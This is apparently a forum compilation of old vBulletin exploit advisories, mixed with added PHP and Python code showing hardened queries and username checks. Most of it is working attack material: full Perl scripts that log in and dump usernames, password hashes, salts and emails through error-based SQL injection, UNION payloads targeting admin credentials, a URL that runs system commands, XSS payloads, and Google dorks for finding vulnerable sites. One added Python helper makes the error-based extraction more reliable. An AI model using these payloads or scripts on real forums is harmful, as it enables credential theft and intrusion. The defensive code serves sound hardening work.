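function buildGroupNameQueryUnsafe(array $value): string
{
    return "SELECT socialgroup.name FROM socialgroup AS socialgroup"
         . " WHERE socialgroup.groupid IN (" . implode(', ', $value) . ")";
}

// Hardened: every element must be a string of digits (or an int) before it
// is accepted; the SQL then carries one placeholder per id.
function normaliseGroupIds($value): array
{
    if (!is_array($value)) {
        $value = [$value];
    }
    $ids = [];
    foreach ($value as $v) {
        if (is_int($v)) {
            $v = (string) $v;
        }
        // ctype_digit() refuses '', ' ', '-1' and anything containing ')' or spaces.
        if (!is_string($v) || $v === '' || !ctype_digit($v)) {
            throw new InvalidArgumentException('messagegroupid must be a whole number');
        }
        $ids[] = (int) $v;
    }
    return array_values(array_unique($ids));
}

function buildGroupNameQuerySafe(array $ids): array
{
    if ($ids === []) {
        throw new InvalidArgumentException('empty messagegroupid list');
    }
    $placeholders = implode(', ', array_fill(0, count($ids), '?'));
    $sql = "SELECT socialgroup.name FROM socialgroup AS socialgroup"
         . " WHERE socialgroup.groupid IN ($placeholders)";
    return [$sql, $ids];
}

function fetchGroupNames(PDO $db, $messagegroupid): array
{
    [$sql, $ids] = buildGroupNameQuerySafe(normaliseGroupIds($messagegroupid));
    $stmt = $db->prepare($sql);
    $stmt->execute($ids);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed input shaped like the advisory's payload.
$hostile = ['3 ) UNION SELECT concat(username,0x3a,password) FROM user WHERE userid=1#'];
echo buildGroupNameQueryUnsafe($hostile), "\n";   // the injected text is now part of the statement

try {
    normaliseGroupIds($hostile);
} catch (InvalidArgumentException $e) {
    echo 'hardened: ', $e->getMessage(), "\n";    // hardened: messagegroupid must be a whole number
}

[$sql, $ids] = buildGroupNameQuerySafe(normaliseGroupIds(['3', 7, '3']));
echo $sql, "\n";                // ... WHERE socialgroup.groupid IN (?, ?)
echo implode(',', $ids), "\n";  // 3,7
```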

Ashiyane Digital Security Members/vBulletin adminCP Cross Site Scripting 

Código:
############################################################################
 
                .::vBulletin adminCP Cross-Site Scripting ::.
 
# Exploit Title: vBulletin adminCP Cross-Site Scripting
# Date: 2009
# Author: Ashiyane Digital Security Members (Cair3x)
# Software Link: http://www.vbulletin.com/
# Version: 3.8.4 and all Version
# Tested on: vBulletin 3.8.4
# CVE :
# Code :
 
 
                 -::Forum Manager => Add New Forum ::-
 
Exploit : 
 
Go To ( http://127.0.0.1/vb/admincp/forum.php?do=add )
 
Add a new title . use the following code as title name : 
 
.::<Script>Alert('Ashiyane')</Script> ::. Or Any Other Xss Code .
 
 
               -::Calendar Manager => Add New Calendar ::-
 
Exploit : 
 
Go To ( http://127.0.0.1/vb/admincp/admincalendar.php?do=add )
 
Add a new title . use the following code as title name : 
 
.::<Script>Alert('Ashiyane')</Script> ::. Or Any Other Xss Code .
 
 
               -::Usergroup Manager => Add New Usergroup ::-
 
Exploit : 
 
Go To ( http://127.0.0.1/vb/admincp/usergroup.php?do=add )
 
Add a new title . use the following code as title name : 
 
.::<Script>Alert('Ashiyane')</Script> ::. Or Any Other Xss Code .
 
 
                   -::User Rank Manager => Rank Type ::-
 
Exploit : 
 
Go To ( http://127.0.0.1/vb/admincp/ranks.php?do=add )
 
use the following code as (OR you may enter text HTML is allowed) Text . 
 
.::<Script>Alert('Ashiyane')</Script> ::. Or Any Other Xss Code .
 
 
               -::BB Code Manager => Add New BB Code ::-
 
Exploit : 
 
Go To ( http://127.0.0.1/vb/admincp/bbcode.php?do=add )
 
Complete All Required Fields And Enter Javascript Code in Title : 
 
.::<Script>Alert('Ashiyane')</Script> ::. Or Any Other Xss Code .
 
 
          -::Scheduled Task Manager => Add New Scheduled Task ::-
 
Exploit : 
 
Go To ( http://127.0.0.1/vb/admincp/cronadmin.php?do=edit )
 
Complete All Required Fields And Enter Javascript Code in Title : 
 
.::<Script>Alert('Ashiyane')</Script> ::. Or Any Other Xss Code .
 
 
 
               -::FAQ Manager => Add New FAQ Item  ::-
 
Exploit : 
 
Go To ( http://127.0.0.1/vb/admincp/faq.php?do=add )
 
Add a new title . use the following code as title name : 
 
.::<Script>Alert('Ashiyane')</Script> ::. Or Any Other Xss Code .
 
 
 
               -::Style Manager => Add New Style ::-
 
Exploit : 
 
Go To ( http://127.0.0.1/vb/admincp/template.php?do=addstyle )
 
Add a new title . use the following code as title name : 
 
.::<Script>Alert('Ashiyane')</Script> ::. Or Any Other Xss Code .
 
All of the best
 
* Cair3x From Ashiyane Digital Security Members : (WwW.Ashiyane.org/forums/)
vBulletin adminCP version 3.8.4 suffers from a cross site scripting vulnerability.

d3v1l/vBulletin Radio And TV Player Cross Site Scripting 

Código:
vBulletin Radio and TV Player Add-On (all version) - XSS , Iframe injection and Redirect Vulnerability 
 
About:- 
 
Radio and TV Add-on will add a radio and TV library to your forum.
 
Features:- 
 
- Users can add / delete / edit own stations
 
For more info about this plugin See - http://www.vbulletin.org/forum/showt...037&page=2 
 
Note:-  
 
- To exploit this bug you need to be registered! After you are registered you can add a new radio station
  where the station name can be "><script>alert(String.fromCharCode(88,83,83))</script>
  and the URL "><script>alert(String.fromCharCode(88,83,83))</script>
 
 
Poc: XSS 
 
http://www.musicadigitale.net/forum/...php?station=92 
 
Poc: Iframe 
 
http://www.musicadigitale.net/forum/...php?station=93 
 
Poc: Redirect 
 
http://www.musicadigitale.net/forum/...php?station=94
 
dorks:- inurl:radioandtv.php 
 
Bug founded by d3v1l [Avram Marius] 
 
Date: 14.06.2009 
 
https://security-shell.ws/forum.php 
http://security-sh3ll.blogspot.com
The vBulletin Radio and TV Player add-on suffers from cross site scripting, iframe injection, and redirect vulnerabilities.

D4rkB1t/vBulletin 4.1.2 SQL Injection

Código:
====================================================================
#vBulletin  4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability#
====================================================================
#                                                                  #
#         888     d8          888   _   888          ,d   d8       #
#    e88~\888    d88   888-~\ 888 e~ ~  888-~88e  ,d888 _d88__     #
#   d888  888   d888   888    888d8b    888  888b   888  888       #
#   8888  888  / 888   888    888Y88b   888  8888   888  888       #
#   Y888  888 /__888__ 888    888 Y88b  888  888P   888  888       #
#    "88_/888    888   888    888  Y88b 888-_88"    888  "88_/     #
#                                                                  #
====================================================================
#PhilKer - PinoyHack - RootCON - GreyHat Hackers - Security Analyst#
====================================================================
 
#[+] Discovered By   : D4rkB1t
#[+] Site            : NaN
#[+] support e-mail  : d4rkb1t@live.com
 
 
Product: http://www.vbulletin.com
Version: 4.0.x
Dork : inurl:"search.php?search_type=1"
 
--------------------------
#   ~Vulnerable Codes~   #
--------------------------
/vb/search/searchtools.php - line 715;
/packages/vbforum/search/type/socialgroup.php - line 201:203;
 
--------------------------
#        ~Exploit~       #
--------------------------
POST data on "Search Multiple Content Types" => "groups"
 
&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#
 
More info: http://j0hnx3r.org/?p=818
 
--------------------------
#        ~Advice~        #
--------------------------
Vendor already released a patch on vb#4.1.3.
UPDATE NOW!
 
====================================================================
# 1337day.com [2011-5-21]
====================================================================
vBulletin versions 4.0.x through 4.1.2 suffer from a remote SQL injection vulnerability.

MaXe/vBulletin 4.0.8 - Persistent XSS via Profile Customization 

Código:
Title: vBulletin 4.0.8 - Persistent XSS via Profile Customization
 
 
Body:
vBulletin - Persistent Cross Site Scripting via Profile Customization
 
 
Versions Affected: 4.0.8 (3.8.* is not vulnerable.)
 
Info:
Content publishing, search, security, and more— vBulletin has it all.
Whether it’s available features, support, or ease-of-use, vBulletin offers
the most for your money. Learn more about what makes vBulletin the
choice for people who are serious about creating thriving online communities.
 
External Links:
http://www.vbulletin.com
 
Credits: MaXe (@InterN0T)
 
 
-:: The Advisory ::-
vBulletin is prone to a Persistent Cross Site Scripting vulnerability within the
Profile Customization feature. If this feature is not enabled the vulnerability 
does not exist and the installation of vBulletin is thereby secure.
 
Within the profile customization fields, it is possible to enter colour codes,
rgb codes and even images. The image url() function does not sanitize user
input in a sufficient way causing vBulletin to be vulnerable to XSS attacks.
 
[1] Private Reflected XSS:
An attacker can inject scripts in a simple way, which is only visible to the attacker.
 
Proof of Concept:
url(</script><img src="x:x" onerror="alert(String.fromCharCode(73,110,116,101,114,78,48,84,11))" />)
(This is only visible to the attacker when he or she is logged in, and browsing his or her own profile.)
 
[2] Global Reflected XSS:
An attacker can inject malicious CSS data executing javascript, which is then visible
to anyone browsing the user profile. Even guests visiting the malicious user profile.
 
Proof of Concept: (IE6 only, may not work in IE7+ and FF)
url(/);background:url(javascript:document.write(1337))
url(/);width:expression(alert('www.intern0t.net'))
 
 
Please note that some of these strings may be too long to be injected. However a
blog entry at Exploit-DB and a video on YouTube will be released very soon.
 
 
-:: Solution ::-
Turn off profile customization immediately for users able to customize their profile!
When a security patch has been provided by the vendor, enable this feature again.
 
 
Disclosure Information:
- Vulnerability found and researched: 11th November 2010
- Vendor (vBulletin Solutions / IB) contacted: 11th November
- Disclosed to Exploit-DB, Bugtraq and InterN0T: 14th November
 
References:
http://forum.intern0t.net/intern0t-a...omization.html
http://www.vbulletin.com/forum/showt...zation-exploit
 Immortal Boy/vBulletin 3.8.4 & 3.8.5 Registration Bypass Vulnerability ( php)

Code:
===============================================================
vBulletin 3.8.4 & 3.8.5 Registration Bypass Vulnerability
===============================================================
 
 
   010101010101010101010101010101010101010101010101010101010   
   0                                                       0
   1  Iranian Datacoders Security Team 2010                1
   0                                                       0
   010101010101010101010101010101010101010101010101010101010
  
 
# Exploit Title: vBulletin 3.8.4 & 3.8.5 Around Registration Vulnerability
# Date: 29/08/2010                            
# Author: Immortal Boy                     
# Software Link: http://www.vbulletin.org
# Version: 3.8.4 & 3.8.5
# Google dork 1 : powered by vBulletin 3.8.4
# Google dork 2 : powered by vBulletin 3.8.5
# Platform / Tested on: Multiple
# Category: webapplications
# Code : N/A
  
#  BUG :  #########################################################################
  
1 > Go to Http://[localhost]/path/register.php
 
2 > Assume that forum admin user name is ADMIN
 
3 > Type this at User Name ===> ADMIN&#00
 
4 > &#00 is an ASCII Code
 
5 > And complete the other parameters
 
6 > Then click on Complete Registrarion
 
7 > Now you see that your user name like admin user name
  
After this, private messages addressed to the user (ADMIN) end up being sent to you.
 
 
#  Patch :  #######################################################################
 
1 > Go to AdminCP
 
2 > Click on vBulletin Options and choose vBulletin Options
 
3 > Choose Censorship Options
 
4 > type &# in Censored Words section
 
5 > Then click on Save
 
#############################################################################
 
Our Website : http://www.datacoders.ir
  
Special Thanks to : H-SK33PY , NEO , Sp|R|T , BigB4NG , 3r1ck , Dr.mute ,
 
hosinn , NIK , uones , mohammad_ir &  all iranian datacoders members
  
#############################################################################
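The bypass above works because "ADMIN&#00" is stored as a different string from "ADMIN" but renders the same in a browser. The advisory's patch (censoring "&#") blocks that one trick; the check below is an added example in Python, not vBulletin's code, of what a registration handler should do instead: refuse character references outright, then compare names after decoding entities and dropping invisible characters. The NFKC folding and control/format-character stripping go beyond the entity trick in the advisory (an assumption that the same collision rule is wanted for zero-width and compatibility characters); the helper names are made up for this example.

```python
import html
import re
import unicodedata

# Numeric or named character references, with or without the closing ';'
# ("&#00" in the advisory has none); a bare '&' as in "AT&T" is left alone.
ENTITY_RE = re.compile(r"&(#[0-9]+|#[xX][0-9A-Fa-f]+|[A-Za-z][A-Za-z0-9]*;)")


def normalize_username(name):
    """Reduce a name to what a reader actually sees: decode entities (so
    'ADMIN&#00' and 'ADMIN' collapse together), NFKC-fold compatibility forms,
    drop control/format characters and the U+FFFD that html.unescape emits
    for &#0, then trim and casefold."""
    decoded = unicodedata.normalize("NFKC", html.unescape(name))
    visible = "".join(
        ch for ch in decoded
        if unicodedata.category(ch) not in ("Cc", "Cf") and ch != "\ufffd"
    )
    return visible.strip().casefold()


def registration_check(candidate, existing_names):
    """Return (accepted, reason). The first rule is the advisory's workaround
    (censor '&#') made explicit; the second catches names that only look
    identical once rendered. Assumption: existing_names is the list of
    usernames already in the user table."""
    if ENTITY_RE.search(candidate):
        return False, "character references are not allowed in usernames"
    norm = normalize_username(candidate)
    if not norm:
        return False, "username is empty once invisible characters are removed"
    for existing in existing_names:
        if normalize_username(existing) == norm:
            return False, "renders identically to existing user %r" % (existing,)
    return True, "ok"


if __name__ == "__main__":
    for name in ("ADMIN&#00", "admin\u200b", "Admin ", "ADMIN2"):
        print(repr(name), registration_check(name, ["ADMIN"]))
```

The first rule alone is the advisory's censorship workaround; the second rule is what stops the same impersonation through a zero-width space or trailing whitespace, which the censor list does not catch.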
FB1H2S/Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day ( php)

Code:
# Exploit Title: Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day
# Google Dork: intitle: powered by Vbulletin 4
# Date: 20/07/2011
# Author: FB1H2S    
# Software Link: [http://www.vbulletin.com/]
# Version: [4.x.x]
# Tested on: [relevant os]
# CVE : [http://members.vbulletin.com/]
 
######################################################################################################
Vulnerability:
######################################################################################################
 
Vbulletin 4.x.x => 4.1.3 suffers from an SQL injection Vulnerability in parameter "&messagegroupid" due to improper input validation.
 
#####################################################################################################
Vulnerable Code:
#####################################################################################################
 
File:    /vbforum/search/type/socialgroupmessage.php
Line No: 388
Paramater : messagegroupid
 
 
 
         
        if ($registry->GPC_exists['messagegroupid'] AND count($registry->GPC['messagegroupid']) > 0)
        {
            $value = $registry->GPC['messagegroupid'];
            if (!is_array($value))
            {
                $value = array($value);
            }

            if (!(in_array(' ',$value) OR in_array('',$value)))
            {
                if ($rst = $vbulletin->db->query_read("
                    SELECT socialgroup.name
                    FROM " . TABLE_PREFIX."socialgroup AS socialgroup
--->                WHERE socialgroup.groupid IN (" . implode(', ', $value) .")")
            }
 
 
 
############################################################################################
Exploitation:
############################################################################################
Post data on: -->search.php?search_type=1
          --> Search Single Content Type
 
Keywords :   Valid Group Message
 
Search Type : Group Messages 
 
Search in Group : Valid Group Id
 
&messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#
 
##########################################################################################
More Details:
##########################################################################################
Http://www.Garage4Hackers.com
http://www.garage4hackers.com/showth...rability-0-day
 
 
###########################################################################################
Note:
###########################################################################################
 
The funny part was that a similar bug was found in the same module (the search query) two months back. Anyway, vBulletin has released a patch, as it was reported to them by altex, hence
customers are safe except those lousy Admins. And this bug is for people to play with the many Nulled VB sites out there. "Say No to Piracy Disclosure".
AL3NDALEEB/vBulletin <= 3.0.4 "forumdisplay.php" Code Execution ( php)

Code:
Exploit:
----------------
http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."
 
Conditions:
----------------
1st condition     : $vboptions['showforumusers'] == True , the admin must set
            showforumusers ON in vbulletin options.
 
2nd condition     : $bbuserinfo['userid'] == 0 , you must be an visitor/guest.
 
3rd condition     : $DB_site->fetch_array($forumusers) == True , when you
            visit the forums, it  must has at least one user show the forum.
 
4th condition     : magic_quotes_gpc must be OFF
 
SPECIAL condition : you must bypass unset($GLOBALS["$_arrykey"]) code in
            init.php by secret array GLOBALS[]=1 ;)))
 
# milw0rm.com [2005-02-14]
t0pP8uZz/vBulletin Mod RPG Inferno 2.4 (inferno.php) SQL Injection Vulnerability ( php)

Code:
--==+================================================================================+==--
--==+                   RPG Inferno v2.4 SQL Injection Vulnerability                 +==--
--==+================================================================================+==--
 
 
 
AUTHOR: t0pP8uZz & xprog
SITE: http://infernotechnologies.net/
DORK: intext:"RPG Inferno is not available to guests" or intext:"Battle Ground · Clans · Store · Jobs · Auction · Spells Shop · Statistics · Member List"
 
 
DESCRIPTION: SQL Injection in ID of inferno.php a mod for vBulletin, able to retrieve admin hash/salt.
 
EXPLOIT: 
http://site.com/forum/inferno.php?do=ScanMember&id=-1'/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,user(),database(),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,concat(username,0x3a,password,0x3a,salt),31,@@version,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47/**/from/**/user/**/where/**/usergroupid=6/**/limit/**/0,1/*
 
NOTE: You'll need to be logged into the forum to access inferno.php. Increment the
limit to get the next admin (ie: [limit 0,1] [limit 1,1] [limit 2,1] etc).
 
 
GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net !
 
 
--==+================================================================================+==--
--==+                   RPG Inferno v2.4 SQL Injection Vulnerability                 +==--
--==+================================================================================+==--
 
# milw0rm.com [2007-07-10]
DSecurity/EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability ( php)

Perl code:
#!/usr/bin/env perl
use LWP::UserAgent;
use HTTP::Request;

sub banner {
    print "###################################\n";
    print "############ DSecurity ############\n";
    print "###################################\n";
    print "# Email:dsecurity.vn[at]gmail.com #\n";
    print "###################################\n";
}

if (@ARGV < 5) {
    print "Usage: $0 address username password number_user sleeptime\n";
    print "Example: $0 http://localhost/vbb test test 10 10\n";
    exit();
}

$ua = LWP::UserAgent->new();
$ua->agent("DSecurity");
$ua->cookie_jar({});

# Log in first so the cookie jar carries a valid session to eggavatar.php
# (the securitytoken below is the hard-coded value from the original script)
sub login(@) {
    my $username = shift;
    my $password = shift;
    my $req = HTTP::Request->new(POST => $ARGV[0].'/login.php?do=login');
    $req->content_type('application/x-www-form-urlencoded');
    $req->content("vb_login_username=$username&vb_login_password=$password&s=&securitytoken=1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&do=login&vb_login_md5password=&vb_login_md5password_utf=");
    my $res = $ua->request($req);
}

# Error-based injection through the eggavatar parameter: the selected value is
# echoed back inside MySQL's "Duplicate entry" error (COUNT(*)/GROUP BY/RAND() trick)
sub v_request {
    # Declare
    $print  = $_[0];
    $select = $_[1];
    $from   = $_[2];
    $where  = $_[3];
    $limit  = $_[4];
    $sleep  = $ARGV[4];
    if ($from  eq '') { $from  = 'information_schema.tables'; }
    if ($where eq '') { $where = '1'; }
    if ($limit eq '') { $limit = '0'; }
    if ($sleep eq '') { $sleep = '10'; }

    # Create a request
    my $req = HTTP::Request->new(POST => $ARGV[0].'/eggavatar.php');
    $req->content_type('application/x-www-form-urlencoded');
    $req->content('do=addegg&securitytoken=1299342473-6b3ca11fdfd9f8e39a9bc69638bf32293bce4961&eggavatar=1'."' and (SELECT 1 FROM(SELECT COUNT(*),CONCAT((select $select  from  $from  WHERE $where limit $limit,1),FLOOR(RAND(1)*3))foo FROM information_schema.tables GROUP BY foo)a)-- -'&uid=1&pid=1");

    # Pass request to the user agent and get a response back
    my $res = $ua->request($req);
    #print $res->content;
    my $test = '';
    if ($res->content =~ /(MySQL Error)(.*?)'(.*?)0'(.*)/) { $test = $3; }
    sleep($sleep);
    return $print.$test."\n";
}

&banner;
print "\n#############################################################################################################\n";
print "# EggAvatar for vBulletin 3.8.x SQL Injection Vulnerability                                                 #\n";
print "# Date:06-03-2011                                                                                           #\n";
print "# Author: DSecurity                                                                                         #\n";
print "# Software Link: http://www.vbteam.info/vb-3-8-x-addons-and-template-modifications/19079-tk-egg-avatar.html #\n";
print "# Version: 2.3.2                                                                                            #\n";
print "# Tested on: vBulletin 3.8.0                                                                                #\n";
print "#############################################################################################################\n";

#login
login($ARGV[1], $ARGV[2]);

#Foot print
print v_request('MySQL version: ', '@@version');
print v_request('Data dir: ', '@@datadir');
print v_request('User: ', 'user()');
print v_request('Database: ', 'database()');

#Get user
for ($i = 1; $i <= $ARGV[3]; $i++) {
    print "-----------------------------------------\n";
    $id = v_request('ID: ', 'userid', 'user', '1', $i-1);
    print $id;
    if ($id =~ /(ID:)\s(.*)/) {
        print v_request('Group: ', 'usergroupid', 'user', 'userid='.$2);
        print v_request('Username: ', 'username', 'user', 'userid='.$2);
        print v_request('Password: ', 'password', 'user', 'userid='.$2);
        print v_request('Salt: ', 'salt', 'user', 'userid='.$2);
        print v_request('Email: ', 'email', 'user', 'userid='.$2);
    }
}

D4rkB1t/vBulletin 4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability ( php)

Code:
====================================================================
#vBulletin  4.0.x => 4.1.2 (search.php) SQL Injection Vulnerability#
====================================================================
#                                                                  #
#         888     d8          888   _   888          ,d   d8       #
#    e88~\888    d88   888-~\ 888 e~ ~  888-~88e  ,d888 _d88__     #
#   d888  888   d888   888    888d8b    888  888b   888  888       #
#   8888  888  / 888   888    888Y88b   888  8888   888  888       #
#   Y888  888 /__888__ 888    888 Y88b  888  888P   888  888       #
#    "88_/888    888   888    888  Y88b 888-_88"    888  "88_/     #
#                                                                  #
====================================================================
#PhilKer - PinoyHack - RootCON - GreyHat Hackers - Security Analyst#
====================================================================
 
#[+] Discovered By   : D4rkB1t
#[+] Site            : NaN
#[+] support e-mail  : d4rkb1t@live.com
 
 
Product: http://www.vbulletin.com
Version: 4.0.x
Dork : inurl:"search.php?search_type=1"
 
--------------------------
#   ~Vulnerable Codes~   #
--------------------------
/vb/search/searchtools.php - line 715;
/packages/vbforum/search/type/socialgroup.php - line 201:203;
 
--------------------------
#        ~Exploit~       #
--------------------------
POST data on "Search Multiple Content Types" => "groups"
 
&cat[0]=1) UNION SELECT database()#
&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#
&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#
 
More info: http://j0hnx3r.org/?p=818
 
--------------------------
#        ~Advice~        #
--------------------------
Vendor already released a patch on vb#4.1.3.
UPDATE NOW!
 
====================================================================
# 1337day.com [2011-5-21]
====================================================================
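Both the FB1H2S (messagegroupid) and D4rkB1t (cat[]) advisories above hit the same pattern: an array from the request is checked only for blank elements and then implode()d straight into an IN() list. The following is an added example in Python with an in-memory SQLite database, not vBulletin's code, showing that pattern beside its hardened form. The table and column names follow the advisories; the rows are constructed for the demo, and the payload has MySQL's '#' comment and concat() swapped for SQLite's '--' and '||' so it runs here (the structure, closing the IN list and UNIONing in a user row, is unchanged).

```python
import sqlite3

# Constructed stand-in for the two vBulletin tables the advisories query; the
# table and column names follow the advisories, the rows are made up.
SCHEMA = """
CREATE TABLE socialgroup (groupid INTEGER, name TEXT);
CREATE TABLE user (userid INTEGER, username TEXT, email TEXT, password TEXT, salt TEXT);
INSERT INTO socialgroup VALUES (1, 'Staff'), (3, 'Modders');
INSERT INTO user VALUES (1, 'admin', 'admin@example.test', '5f4dcc3b5aa765d61d8327deb882cf99', 'aB3');
"""


def open_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def group_names_vulnerable(db, values):
    """Same shape as the code quoted in the advisory: the request array is
    only checked for blank elements, then joined straight into IN()."""
    if not isinstance(values, list):
        values = [values]
    if " " in values or "" in values:          # the advisory's in_array() guard
        return []
    sql = ("SELECT socialgroup.name FROM socialgroup AS socialgroup "
           "WHERE socialgroup.groupid IN (" + ", ".join(values) + ")")
    return [row[0] for row in db.execute(sql)]


def group_names_fixed(db, values):
    """Hardened form: every element must be an integer and is bound through
    its own placeholder, so the IN() list can never carry SQL."""
    if not isinstance(values, list):
        values = [values]
    ids = []
    for v in values:
        try:
            ids.append(int(v))
        except (TypeError, ValueError):
            raise ValueError("group id must be an integer: %r" % (v,))
    if not ids:
        return []
    placeholders = ", ".join("?" for _ in ids)
    sql = "SELECT name FROM socialgroup WHERE groupid IN (%s)" % placeholders
    return [row[0] for row in db.execute(sql, ids)]


# The advisories' messagegroupid[0] / cat[0] payload, adapted to SQLite syntax.
PAYLOAD = ("3 ) UNION SELECT username||':'||email||':'||password||':'||salt "
           "FROM user WHERE userid=1 --")


def demo():
    """Returns (rows leaked by the vulnerable query, whether the fixed query
    refused the payload, rows returned by the fixed query for a normal request)."""
    db = open_db()
    leaked = group_names_vulnerable(db, [PAYLOAD])
    try:
        group_names_fixed(db, [PAYLOAD])
        refused = False
    except ValueError:
        refused = True
    normal = group_names_fixed(db, ["3", "1"])
    return leaked, refused, normal


if __name__ == "__main__":
    print(demo())
```

The vulnerable query returns the admin's username:email:hash:salt row alongside the real group name, which is exactly what the advisories extract; the fixed version never reaches the database with that input because int() rejects it before the query is built.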
DSecurity/cChatBox for vBulletin 3.6.8 and 3.7.x SQL Injection Vulnerability ( php)

Perl code:
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request;

$ua = LWP::UserAgent->new;
$ua->agent("MyApp/0.1 ");

print "##################################\n";
print "############ EXPLOIT #############\n";
print "##################################\n";
print "## Portal: cchatbox             ##\n";
print "## Bug: SQLI                    ##\n";
print "## Author: DSecurity            ##\n";
print "## Coder: vv0lll                ##\n";
print "##################################\n";

print "Use: exploit.pl address number_user sleeptime\n";
print "Example: exploit.pl http://localhost/vbb 10 10\n";
if (@ARGV < 2) { exit; }
print "\n\n================================================\n";

#Foot print
print v_request('MySQL version: ', '@@version');
print v_request('Data dir: ', '@@datadir');
print v_request('User: ', 'user()');
print v_request('Database: ', 'database()');

#Get user
for ($i = 1; $i <= $ARGV[1]; $i++) {
    print "-----------------------------------------\n";
    $id = v_request('ID: ', 'userid', 'user', '1', $i-1);
    print $id;
    if ($id =~ /(ID:)\s(.*)/) {
        print v_request('Group: ', 'usergroupid', 'user', 'userid='.$2);
        print v_request('Username: ', 'username', 'user', 'userid='.$2);
        print v_request('Password: ', 'password', 'user', 'userid='.$2);
        print v_request('Salt: ', 'salt', 'user', 'userid='.$2);
        print v_request('Email: ', 'email', 'user', 'userid='.$2);
    }
}

# Error-based injection through the messageid parameter of cchatbox.php: the
# selected value is echoed back inside MySQL's "Duplicate entry" error
sub v_request {
    # Declare
    $print  = $_[0];
    $select = $_[1];
    $from   = $_[2];
    $where  = $_[3];
    $limit  = $_[4];
    $sleep  = $ARGV[2];
    if ($from  eq '') { $from  = 'information_schema.tables'; }
    if ($where eq '') { $where = '1'; }
    if ($limit eq '') { $limit = '0'; }
    if ($sleep eq '') { $sleep = '10'; }

    # Create a request
    my $req = HTTP::Request->new(POST => $ARGV[0].'/cchatbox.php');
    $req->content_type('application/x-www-form-urlencoded');
    $req->content('do=edit&messageid=0 and (SELECT 1 FROM(SELECT COUNT(*),CONCAT((select '.$select.' from '.$from.' WHERE '.$where.' limit '.$limit.',1),FLOOR(RAND(1)*3))x FROM information_schema.tables GROUP BY x)a)');

    # Pass request to the user agent and get a response back
    my $res = $ua->request($req);
    #print $res->content;
    my $test = '';
    if ($res->content =~ /(MySQL Error)(.*?)'(.*?)0'(.*)/) { $test = $3; }
    sleep($sleep);
    return $print.$test."\n";
}
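The two DSecurity scripts above (EggAvatar and cChatBox) use the same error-based technique: the value to leak is CONCAT()ed with a small random digit and used as a GROUP BY key so that MySQL aborts with "Duplicate entry '<value><digit>'" and the forum's database-error page echoes it back. The following is an added example in Python of the client side of that technique, not the DSecurity code: it builds the injected subquery and parses the error page. Two things differ from the scripts and are deliberate: the payload uses the classic FLOOR(RAND(0)*2), whose deterministic sequence reliably repeats a key, and the parser accepts any trailing digit, whereas the scripts' regex only matches a key ending in '0' and silently reports an empty value otherwise. The helper names and sample responses are constructed for this example.

```python
import re
from urllib.parse import parse_qs, urlencode


def duplicate_entry_payload(select, from_="information_schema.tables", where="1", limit=0):
    """Build the subquery the scripts inject. RAND(0) is seeded, so its
    FLOOR(...*2) sequence is 0,1,1,0,1,1,... and the CONCAT()ed GROUP BY key
    repeats, making MySQL raise a duplicate-key error that carries the value."""
    return ("(SELECT 1 FROM(SELECT COUNT(*),CONCAT((select %s from %s WHERE %s limit %d,1),"
            "FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)"
            % (select, from_, where, limit))


def cchatbox_body(select, from_="information_schema.tables", where="1", limit=0):
    """Form-encoded POST body for the cchatbox.php request (hypothetical helper;
    the Perl script sends 'do=edit&messageid=0 and <subquery>' unencoded)."""
    return urlencode({"do": "edit",
                      "messageid": "0 and " + duplicate_entry_payload(select, from_, where, limit)})


# Match the leaked value regardless of which digit was appended. The
# non-greedy group stops at the last digit before the closing quote.
DUP_RE = re.compile(r"Duplicate entry '(.*?)([0-9])' for key", re.S)


def extract_leaked(body):
    """Return the leaked value from a MySQL duplicate-key error page, or None
    when the response carries no such error (query blocked, or no collision)."""
    m = DUP_RE.search(body)
    return m.group(1) if m else None


# Constructed sample responses (not captured from a real forum).
SAMPLE_ENDS_0 = ("<b>Database error</b> in vBulletin 3.8.0: MySQL Error : "
                 "Duplicate entry '5.1.41-3ubuntu12.100' for key 'group_key'")
SAMPLE_ENDS_1 = "MySQL Error : Duplicate entry 'admin:aB31' for key 'group_key'"
SAMPLE_NO_ERROR = "<html><body>Message saved.</body></html>"


if __name__ == "__main__":
    print(cchatbox_body("password", "user", "userid=1"))
    for body in (SAMPLE_ENDS_0, SAMPLE_ENDS_1, SAMPLE_NO_ERROR):
        print(extract_leaked(body))
```

For a practitioner checking whether a board is affected, the useful signal is the second sample: a "Duplicate entry" error containing data from a table the request never named is a reliable indicator on its own, whatever digit the key ends with.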
H-SK33PY/vBulletin(R) 3.8.6 faq.php Information Disclosure Vulnerability ( php)

Code:
010101010101010101010101010101010101010101010101010101010    
   0                                                       0
   1  Iranian Datacoders Security Team 2010
   0                                                       0
   010101010101010101010101010101010101010101010101010101010
 
# Original Advisory: http://forum.intern0t.net/exploits-vulnerabilities-pocs/2857-vbulletin-3-8-6-critical-information-disclosure.html
# Reference: http://www.securityfocus.com/archive/1/512575/30/0/threaded
 
# Exploit Title: vBulletin 3.8.6 faq.php Vulnerability                   
# Date: 24/07/2010                             
# Author: H-SK33PY                      
# Software Link: http://www.vbulletin.com/
# Version: 3.8.6
# Google dork : powered by vBulletin 3.8.6
# Platform / Tested on: linux
# Category: webapplications
# Code : N/A
 
#BUG:#########################################################################
 
